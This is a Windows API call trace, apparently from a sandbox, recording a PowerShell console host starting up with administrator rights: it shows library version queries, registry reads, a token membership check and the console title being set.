	[0920.379] GetWindowThreadProcessId (in: hWnd=0x108a2, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1490
	[0920.379] GetWindowThreadProcessId (in: hWnd=0x10890, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x14a4
	[0920.379] GetWindowThreadProcessId (in: hWnd=0x1087e, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x148c
	[0920.379] GetWindowThreadProcessId (in: hWnd=0x1084a, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1458
	[0920.379] GetWindowThreadProcessId (in: hWnd=0x10840, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1b4c
	[0920.379] GetWindowThreadProcessId (in: hWnd=0x20616, lpdwProcessId=0x22dd20 | out: lpdwProcessId=0x22dd20) returned 0x1b3c
	[0920.382] WerSetFlags () returned 0x0
	[0921.136] SetThreadPreferredUILanguages (in: dwFlags=0x100, pwszLanguagesBuffer=0x0, pulNumLanguages=0x0 | out: pulNumLanguages=0x0) returned 1
	[0921.136] CoTaskMemFree (pv=0x0) 
	[0921.136] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x22e088, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x22e080 | out: pulNumLanguages=0x22e088, pwszLanguagesBuffer=0x0, pcchLanguagesBuffer=0x22e080) returned 1
	[0921.136] GetThreadPreferredUILanguages (in: dwFlags=0x38, pulNumLanguages=0x22e088, pwszLanguagesBuffer=0x2f2f7d8, pcchLanguagesBuffer=0x22e080 | out: pulNumLanguages=0x22e088, pwszLanguagesBuffer=0x2f2f7d8, pcchLanguagesBuffer=0x22e080) returned 1
	[0921.139] CoTaskMemAlloc (cb=0x24) returned 0x4e98e0
	[0921.139] GetUserDefaultLocaleName (in: lpLocaleName=0x4e98e0, cchLocaleName=16 | out: lpLocaleName="en-US") returned 6
	[0921.142] CoTaskMemFree (pv=0x4e98e0) 
	[0921.164] CoTaskMemAlloc (cb=0x104) returned 0x4dfcc0
	[0921.164] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfcc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0921.164] CoTaskMemFree (pv=0x4dfcc0) 
	[0921.166] CoTaskMemAlloc (cb=0x104) returned 0x4dfcc0
	[0921.166] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfcc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0921.166] CoTaskMemFree (pv=0x4dfcc0) 
	[0921.901] CoTaskMemAlloc (cb=0x104) returned 0x4dfcc0
	[0921.901] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfcc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0921.901] CoTaskMemFree (pv=0x4dfcc0) 
	[0921.922] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0921.923] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22daf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0921.923] SetErrorMode (uMode=0x1) returned 0x1
	[0921.923] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x22dd00 | out: lpFileInformation=0x22dd00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0924.923] SetErrorMode (uMode=0x1) returned 0x1
	[0924.923] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x22df70 | out: lpdwHandle=0x22df70) returned 0x94c
	[0924.925] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2f33068 | out: lpData=0x2f33068) returned 1
	[0924.926] VerQueryValueW (in: pBlock=0x2f33068, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x22dee8, puLen=0x22dee0 | out: lplpBuffer=0x22dee8*=0x2f33104, puLen=0x22dee0) returned 1
	[0924.926] VerQueryValueW (in: pBlock=0x2f33068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x22de58, puLen=0x22de50 | out: lplpBuffer=0x22de58*=0x2f331e0, puLen=0x22de50) returned 1
	[0924.926] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0924.926] CoTaskMemAlloc (cb=0x2e) returned 0x4e3d50
	[0924.926] lstrcpyW (in: lpString1=0x4e3d50, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0924.926] CoTaskMemFree (pv=0x4e3d50) 
	[0924.926] VerQueryValueW (in: pBlock=0x2f33068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x22de58, puLen=0x22de50 | out: lplpBuffer=0x22de58*=0x2f33234, puLen=0x22de50) returned 1
	[0924.926] lstrlenW (lpString="System.Management.Automation") returned 28
	[0924.926] CoTaskMemAlloc (cb=0x3c) returned 0x45b030
	[0924.926] lstrcpyW (in: lpString1=0x45b030, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0924.926] CoTaskMemFree (pv=0x45b030) 
	[0924.926] VerQueryValueW (in: pBlock=0x2f33068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x22de58, puLen=0x22de50 | out: lplpBuffer=0x22de58*=0x2f33290, puLen=0x22de50) returned 1
	[0924.926] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0924.926] CoTaskMemAlloc (cb=0x20) returned 0x4e9940
	[0924.926] lstrcpyW (in: lpString1=0x4e9940, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0924.927] CoTaskMemFree (pv=0x4e9940) 
	[0924.927] VerQueryValueW (in: pBlock=0x2f33068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x22de58, puLen=0x22de50 | out: lplpBuffer=0x22de58*=0x2f332d0, puLen=0x22de50) returned 1
	[0924.927] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0924.927] CoTaskMemAlloc (cb=0x44) returned 0x45b030
	[0924.927] lstrcpyW (in: lpString1=0x45b030, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0924.927] CoTaskMemFree (pv=0x45b030) 
	[0924.927] VerQueryValueW (in: pBlock=0x2f33068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x22de58, puLen=0x22de50 | out: lplpBuffer=0x22de58*=0x2f33338, puLen=0x22de50) returned 1
	[0924.927] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0924.927] CoTaskMemAlloc (cb=0x76) returned 0x485e20
	[0924.927] lstrcpyW (in: lpString1=0x485e20, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0924.927] CoTaskMemFree (pv=0x485e20) 
	[0924.927] VerQueryValueW (in: pBlock=0x2f33068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x22de58, puLen=0x22de50 | out: lplpBuffer=0x22de58*=0x2f333d4, puLen=0x22de50) returned 1
	[0924.927] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0924.927] CoTaskMemAlloc (cb=0x44) returned 0x45b030
	[0924.927] lstrcpyW (in: lpString1=0x45b030, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0924.928] CoTaskMemFree (pv=0x45b030) 
	[0924.928] VerQueryValueW (in: pBlock=0x2f33068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x22de58, puLen=0x22de50 | out: lplpBuffer=0x22de58*=0x2f33438, puLen=0x22de50) returned 1
	[0924.928] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0924.928] CoTaskMemAlloc (cb=0x58) returned 0x434e80
	[0924.928] lstrcpyW (in: lpString1=0x434e80, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0924.928] CoTaskMemFree (pv=0x434e80) 
	[0924.928] VerQueryValueW (in: pBlock=0x2f33068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x22de58, puLen=0x22de50 | out: lplpBuffer=0x22de58*=0x2f334b4, puLen=0x22de50) returned 1
	[0924.928] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0924.928] CoTaskMemAlloc (cb=0x20) returned 0x4e9940
	[0924.928] lstrcpyW (in: lpString1=0x4e9940, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0924.928] CoTaskMemFree (pv=0x4e9940) 
	[0924.928] VerQueryValueW (in: pBlock=0x2f33068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x22de58, puLen=0x22de50 | out: lplpBuffer=0x22de58*=0x2f3315c, puLen=0x22de50) returned 1
	[0924.928] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0924.928] CoTaskMemAlloc (cb=0x66) returned 0x4e8210
	[0924.928] lstrcpyW (in: lpString1=0x4e8210, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0924.928] CoTaskMemFree (pv=0x4e8210) 
	[0924.928] VerQueryValueW (in: pBlock=0x2f33068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x22de58, puLen=0x22de50 | out: lplpBuffer=0x22de58*=0x0, puLen=0x22de50) returned 0
	[0924.928] VerQueryValueW (in: pBlock=0x2f33068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x22de58, puLen=0x22de50 | out: lplpBuffer=0x22de58*=0x0, puLen=0x22de50) returned 0
	[0924.928] VerQueryValueW (in: pBlock=0x2f33068, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x22de58, puLen=0x22de50 | out: lplpBuffer=0x22de58*=0x0, puLen=0x22de50) returned 0
	[0924.929] VerQueryValueW (in: pBlock=0x2f33068, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x22de28, puLen=0x22de20 | out: lplpBuffer=0x22de28*=0x2f33104, puLen=0x22de20) returned 1
	[0924.929] CoTaskMemAlloc (cb=0x204) returned 0x47e120
	[0924.929] VerLanguageNameW (in: wLang=0x0, szLang=0x47e120, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0924.929] CoTaskMemFree (pv=0x47e120) 
	[0924.929] VerQueryValueW (in: pBlock=0x2f33068, lpSubBlock="\\", lplpBuffer=0x22de78, puLen=0x22de70 | out: lplpBuffer=0x22de78*=0x2f33090, puLen=0x22de70) returned 1
	[0924.956] CoTaskMemAlloc (cb=0x104) returned 0x4dfcc0
	[0924.956] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfcc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0924.960] CoTaskMemFree (pv=0x4dfcc0) 
	[0924.965] CoTaskMemAlloc (cb=0x104) returned 0x4dfcc0
	[0924.965] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfcc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0924.965] CoTaskMemFree (pv=0x4dfcc0) 
	[0924.969] lstrlenW (lpString="䅁") returned 1
	[0925.868] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x22dd48 | out: phkResult=0x22dd48*=0x2c4) returned 0x0
	[0925.870] RegOpenKeyExW (in: hKey=0x2c4, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x22dd38 | out: phkResult=0x22dd38*=0x2c8) returned 0x0
	[0925.870] RegOpenKeyExW (in: hKey=0x2c8, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22ddc8 | out: phkResult=0x22ddc8*=0x2cc) returned 0x0
	[0925.872] RegQueryValueExW (in: hKey=0x2cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22dd0c, lpData=0x0, lpcbData=0x22dd08*=0x0 | out: lpType=0x22dd0c*=0x1, lpData=0x0, lpcbData=0x22dd08*=0x56) returned 0x0
	[0925.873] CoTaskMemAlloc (cb=0x5a) returned 0x4e81a0
	[0925.873] RegQueryValueExW (in: hKey=0x2cc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22dcdc, lpData=0x4e81a0, lpcbData=0x22dcd8*=0x56 | out: lpType=0x22dcdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22dcd8*=0x56) returned 0x0
	[0925.874] CoTaskMemFree (pv=0x4e81a0) 
	[0925.884] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d860, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0925.899] CoTaskMemAlloc (cb=0x104) returned 0x4dfcc0
	[0925.899] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfcc0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0925.899] CoTaskMemFree (pv=0x4dfcc0) 
	[0929.242] CoTaskMemAlloc (cb=0x104) returned 0x4dfdd0
	[0929.242] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfdd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0929.242] CoTaskMemFree (pv=0x4dfdd0) 
	[0929.243] CoTaskMemAlloc (cb=0x104) returned 0x4dfdd0
	[0929.244] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfdd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0929.244] CoTaskMemFree (pv=0x4dfdd0) 
	[0929.249] CoTaskMemAlloc (cb=0x104) returned 0x4dfdd0
	[0929.250] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfdd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0929.250] CoTaskMemFree (pv=0x4dfdd0) 
	[0929.251] CoTaskMemAlloc (cb=0x104) returned 0x4dfdd0
	[0929.251] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfdd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0929.251] CoTaskMemFree (pv=0x4dfdd0) 
	[0929.251] CoTaskMemAlloc (cb=0x104) returned 0x4dfdd0
	[0929.251] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfdd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0929.251] CoTaskMemFree (pv=0x4dfdd0) 
	[0930.383] CoTaskMemAlloc (cb=0x104) returned 0x4dfdd0
	[0930.383] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfdd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0930.384] CoTaskMemFree (pv=0x4dfdd0) 
	[0930.387] CoTaskMemAlloc (cb=0x104) returned 0x4dfdd0
	[0930.387] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfdd0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0930.387] CoTaskMemFree (pv=0x4dfdd0) 
	[0932.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0932.708] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d900, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0936.042] CoTaskMemAlloc (cb=0x104) returned 0x4dfff0
	[0936.042] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0936.043] CoTaskMemFree (pv=0x4dfff0) 
	[0936.515] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x22da20, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0936.515] SetErrorMode (uMode=0x1) returned 0x1
	[0936.515] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x22dca0 | out: lpFileInformation=0x22dca0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0936.515] SetErrorMode (uMode=0x1) returned 0x1
	[0965.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22db00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22da50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.479] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22da50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0965.482] CoTaskMemAlloc (cb=0x104) returned 0x4dfff0
	[0965.482] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0965.482] CoTaskMemFree (pv=0x4dfff0) 
	[0965.485] CoTaskMemAlloc (cb=0x104) returned 0x4dfff0
	[0965.485] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0965.485] CoTaskMemFree (pv=0x4dfff0) 
	[0965.485] CoTaskMemAlloc (cb=0x104) returned 0x4dfff0
	[0965.485] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0965.485] CoTaskMemFree (pv=0x4dfff0) 
	[0965.490] CoCreateGuid (in: pguid=0x22e068 | out: pguid=0x22e068*(Data1=0xbbdfaf69, Data2=0x2da7, Data3=0x4194, Data4=([0]=0xa0, [1]=0x42, [2]=0xd2, [3]=0x1b, [4]=0x33, [5]=0xe9, [6]=0xdc, [7]=0x73))) returned 0x0
	[0965.493] CoTaskMemAlloc (cb=0x104) returned 0x4dfff0
	[0965.493] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0965.493] CoTaskMemFree (pv=0x4dfff0) 
	[0965.496] CoTaskMemAlloc (cb=0x104) returned 0x4dfff0
	[0965.496] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0965.496] CoTaskMemFree (pv=0x4dfff0) 
	[0965.498] CoTaskMemAlloc (cb=0x104) returned 0x4dfff0
	[0965.498] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x4dfff0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0965.498] CoTaskMemFree (pv=0x4dfff0) 
	[0965.519] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0965.867] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x22dd10 | out: lpConsoleScreenBufferInfo=0x22dd10) returned 1
	[0965.889] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0965.897] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x22dd10 | out: lpConsoleScreenBufferInfo=0x22dd10) returned 1
	[0965.900] GetCurrentProcess () returned 0xffffffffffffffff
	[0965.901] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x22dd38 | out: TokenHandle=0x22dd38*=0x2e4) returned 1
	[0965.903] GetTokenInformation (in: TokenHandle=0x2e4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x22dc58 | out: TokenInformation=0x0, ReturnLength=0x22dc58) returned 0
	[0965.904] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4472a0
	[0965.904] GetTokenInformation (in: TokenHandle=0x2e4, TokenInformationClass=0x8, TokenInformation=0x4472a0, TokenInformationLength=0x4, ReturnLength=0x22dc58 | out: TokenInformation=0x4472a0, ReturnLength=0x22dc58) returned 1
	[0965.906] DuplicateTokenEx (in: hExistingToken=0x2e4, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x22ddb8 | out: phNewToken=0x22ddb8*=0x2a4) returned 1
	[0965.906] GetTokenInformation (in: TokenHandle=0x2e4, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x22dc58 | out: TokenInformation=0x0, ReturnLength=0x22dc58) returned 0
	[0965.906] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4472d0
	[0965.906] GetTokenInformation (in: TokenHandle=0x2e4, TokenInformationClass=0x8, TokenInformation=0x4472d0, TokenInformationLength=0x4, ReturnLength=0x22dc58 | out: TokenInformation=0x4472d0, ReturnLength=0x22dc58) returned 1
	[0965.907] CheckTokenMembership (in: TokenHandle=0x2a4, SidToCheck=0x300de10*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x22ddc8 | out: IsMember=0x22ddc8) returned 1
	[0965.907] CloseHandle (hObject=0x2a4) returned 1
	[0966.122] CoTaskMemAlloc (cb=0x804) returned 0x1b95b920
	[0966.122] GetConsoleTitleW (in: lpConsoleTitle=0x1b95b920, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0966.123] CoTaskMemFree (pv=0x1b95b920) 
	[0966.136] CoTaskMemAlloc (cb=0x804) returned 0x1b95c1d0
	[0966.136] GetConsoleTitleW (in: lpConsoleTitle=0x1b95c1d0, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0966.136] CoTaskMemFree (pv=0x1b95c1d0) 
	[0966.137] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0966.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0966.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0966.429] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d7e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0966.430] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x22d890, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
